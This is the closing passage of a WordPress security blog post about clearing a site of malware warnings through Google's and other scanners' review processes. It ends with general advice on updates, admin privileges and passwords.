From my experience, I have had a reply anywhere from 1 day to 3 days.

This is what you eventually want to see.
It means that your website will be cleared of all warnings, and your site is now safe for visitors.

Note: You may have to repeat a similar process with other malware scanning sites such as Norton Safe Web, as they will also flag your website. Each has its own review process, so you just need to follow their instructions to clear your website of any warnings.

Below: Google Video on the Review Process

Conclusion

“Hardware is easy to protect: lock it in a room, chain it to a desk, or buy a spare.
Information poses more of a problem. It can exist in more than one place; be transported halfway across the planet in seconds; and be stolen without your knowledge.”
[Bruce Schneier, Protect Your Macintosh, 1994]

There is a lot of information in this post, and there is still much more which I did not cover or only mentioned briefly at this time, such as:

  • “Social Engineering Content” warnings
  • wp-config.php file
  • Server
  • Backdoors

There might be a Part 2 coming down the road in the future.

WordPress is basically a secure platform.
People are the problem: they allow their websites to be compromised because they are not cautious about what they install (plugins, themes), hold off on performing updates, give too many users full Admin privileges, use simple passwords because they are lazy, etc.

So what do you think, are there WordPress security tips or horror stories you want to share?
Gerald Watanabe
Islandwebtek
